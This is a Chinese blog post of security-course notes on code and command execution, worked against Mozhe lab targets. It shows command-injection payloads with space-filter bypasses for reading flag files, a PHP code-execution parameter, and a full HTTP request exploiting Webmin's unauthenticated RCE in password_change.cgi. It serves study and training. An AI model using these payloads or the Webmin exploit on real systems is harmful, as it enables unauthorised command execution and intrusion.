[小迪安全30天]SRC代码执行

最新推荐文章于 2022-01-06 21:01:09 发布
最新推荐文章于 2022-01-06 21:01:09 发布
阅读量348 收藏
点赞数
分类专栏: 小迪安全笔记 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54252904/article/details/117451225
版权

代码执行

先看系统类型

执行函数看这两篇
https://blog.csdn.net/weixin_54252904/article/details/115801128
https://blog.csdn.net/weixin_54252904/article/details/115801148

漏洞形成的条件:
可控变量,漏洞函数

漏洞发现

可通过url上的敏感代码如:
在这里插入图片描述
有的是经过编码的,所有要多观察url的可以数据

命令执行

环境来源:墨者靶场

可执行ping命令
在这里插入图片描述
输入命令 127.0.0.1|ls
在这里插入图片描述
禁用本地js
在这里插入图片描述
输入 127.0.0.1|cat key_296172863019530.php
不回显,考虑绕过空格

linux绕过空格
在这里插入图片描述
输入命令127.0.0.1|cat<key_296172863019530.php
在这里插入图片描述
成功!

php代码执行

靶场环境:墨者

在这里插入图片描述
对代码进行执行
在这里插入图片描述
传递参数
?a=tac$IFS$9key_28397852121210.php
在这里插入图片描述
成功!!

Webmin未经身份验证的远程代码执行

靶场环境:墨者
在这里插入图片描述
搜索webmin,存在代码执行漏洞
在这里插入图片描述
exp

POST /password_change.cgi HTTP/1.1
Host: 219.153.49.228:41273
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Cookie: redirect=1; testing=1; sid=x; sessiontest=1
Referer: http://219.153.49.228:41273/password_change.cgi/session_login.cgi
Content-Type: application/x-www-form-urlencoded
Content-Length: 55
cache-control: no-cache

user=rootxx&pam=&expired=2&old=ls&new1=test2&new2=test2

修改对应的部分,进行发包
在这里插入图片描述
修改为ls /
在这里插入图片描述
成功
在这里插入图片描述

道长在此
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
SRC代码及论文
08-14
METAFACE LEARNING FOR SPARSE REPRESENTATION BASED FACE RECOGNITION(Meng Yang提出的用于人脸识别的稀疏编码方法)
src
03-09
星球大战星系源代码(C ++)存储库 这是SWGSource 1.2的主要服务器代码,最初是从存储库中派生的。 请查看该存储库以获取原始发布和更改信用。 正在进行中 testing-64-可以构建但无法运行的完全64位版本,某些typedef出错 建筑 lang版本 重要提示:对于clang <= 4的版本,您可能必须从CMakelists.txt文件中删除/省略不推荐使用的CFLAG或两个 除非要使用64位,否则请仅使用Debug和Release目标。 对于本地测试和非实时构建,请在build_linux.sh中设置MODE = Release或MODE = debug。 对于生产,面向用户的构建,请为配置文件构建的,高度优化的二进制版本设置MODE = MINSIZEREL。 分析和使用配置文件 要生成新的概要文件,请使用MODE = RELWITHDEBINFO构建SWG。 将e
小迪安全学习笔记--第30天:web漏洞-RCE代码及命令执行漏洞全解
zr1213159840的博客
01-06 407
在Web应用中有时候程序员为了考虑灵活性、简洁性,会在代码调用代码或命令执行函数去处理。比如当应用在调用一些能将字符串转化成代码的函数时,没有考虑用户是否能控制这个字符串,将造成代码执行漏洞。同样调用系统命令处理,将造成命令执行漏洞。 代码执行针对的是代码,命令执行针对的是操作系统 例如php中的eval函数,会把传入的参数当做php代码进行执行。 https://www.w3school.com.cn/php/func_misc_eval.asp 还例如php中的system参数,会把传入的参数当做系
(2020上半年第30天(其他漏洞-支付及密码逻辑))小迪网络安全笔记
u013630181的博客
12-05 162
src代码和文档
08-27
里面含有很多的源代码和文档,可以看 system.java 等
log_src 输出执行代码到log文件
10-09
log_src 输出执行代码到log文件; 直接将执行的文件代码输出到log文件,简单方便,提高调试效率;
VC代码 cj60lib_src (实用代码源)
06-17
VC代码 cj60lib_src (实用代码源)VC代码 cj60lib_src (实用代码源)VC代码 cj60lib_src (实用代码源)VC代码 cj60lib_src (实用代码源)VC代码 cj60lib_src (实用代码源)VC代码 cj60lib_src (实用代码源)VC代码 cj60lib...
关于可运行代码无法正常执行的使用说明
09-05
标题中的“关于可运行代码无法正常执行的使用说明”指的是在脚本之家网站上,用户遇到的关于可执行代码不按预期运行的问题。通常,该网站允许用户直接运行代码以预览效果,但某些情况下,代码可能需要依赖外部...
Matlab代码SRC分类稀疏表示分类
04-28
SRC (Sparse Representation Classifier) 稀疏表示分类器 SOMP (Simultaneous Orthogonal Matching Pursuit) 同步正交匹配追踪 稀疏表示分类器应用于高光谱图像分类的MATLAB代码实现。 此程序为论文仿真,论文题目...
求得div 下 img的src地址的js代码
10-31
获取 Div 下 Img 的 Src 地址的 JS 代码 在网页开发中,获取某个元素的属性值是非常常见的操作,而获取 Div 下 Img 的 Src 地址是其中的一种。今天,我们就来讨论如何使用 JavaScript 获取 Div 下 Img 的 Src 地址...
mtalab的SRC代码
04-15
网上找到的SRC代码,方便大家学习。基于压缩感知的人脸识别中可以用到
SRC:常用代码收集资源分享http
03-23
src 这里边是一些常用的资源或代码片段,你不在是一个阅读者,更是一个项目参与者内容创造者,欢迎叉之后拉。 加群说明
导入代码时eclipse的src目录变为包名
weixin_34244102的博客
12-12 304
2019独角兽企业重金招聘Python工程师标准>>> ...
java中文版src_src - WEB源码|JSP源码/Java|源代码 - 源码中国
weixin_29081703的博客
03-02 204
com...\sun...\...\corba...\...\.....\se...\...\.....\..\impl...\...\.....\..\....\activation...\...\.....\..\....\..........\CommandHandler.java...\...\.....\..\....\..........\NameServiceStartThread....
代码src修改为本地图片_SRC漏洞挖掘经验+技巧篇
weixin_39524741的博客
12-01 699
一、漏洞挖掘的前期–信息收集虽然是前期,但是却是我认为最重要的一部分;很多人挖洞的时候说不知道如何入手,其实挖洞就是信息收集+常规owasp top 10+逻辑漏洞(重要的可能就是思路猥琐一点),这些漏洞的测试方法本身不是特别复杂,一般混迹在安全圈子的人都能复现漏洞。接下来我就着重说一下我在信息收集方面的心得。1、域名信息收集src一般都只收对应的漏洞,很多src的公告里面就会明确范围;然后我们就...
JS改变图片src代码
tymcl的专栏
10-30 594
代码: var icon_img = document.getElementById("icon_img"); icon_img.src = url+"?"+Math.random(); 技术原理:当图片src访问地址相同时,IE浏览器会读取缓存中的图片,估带上一个随机参数可以让src地址每次都不同,达到切换图片效果
编程英语:bin,src代码目录的全称与含义
集电极
08-23 5132
编程英语:bin,src代码目录的全称与含义 bin(binary 二进制)用于放置编译后的文件目录,java是.class文件,有的语言是放置二进制文件 src(source 来源)放置源代码的目录
js 替换scriptb标签中的src,并且加载执行
curtain的专栏
10-31 4437
用js创建script可以做到使src的引入的地址加载执行代码如下 "text/javascript">    var xxxHref = 'http://xxx.com.cn/$arr['id']?>/cityId/'+jsCityId.cityId+'/';    var head= document.getElementsByTagName('head')[0];    var s
JavaScript安全与防护:经典代码实践
这些JavaScript代码片段是经典而实用的,它们在网页交互、用户体验以及安全方面都有重要作用。然而,需要注意的是,某些功能(如阻止右键菜单、复制和粘贴)可能会影响正常用户的操作,因此在实际应用中需谨慎使用。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值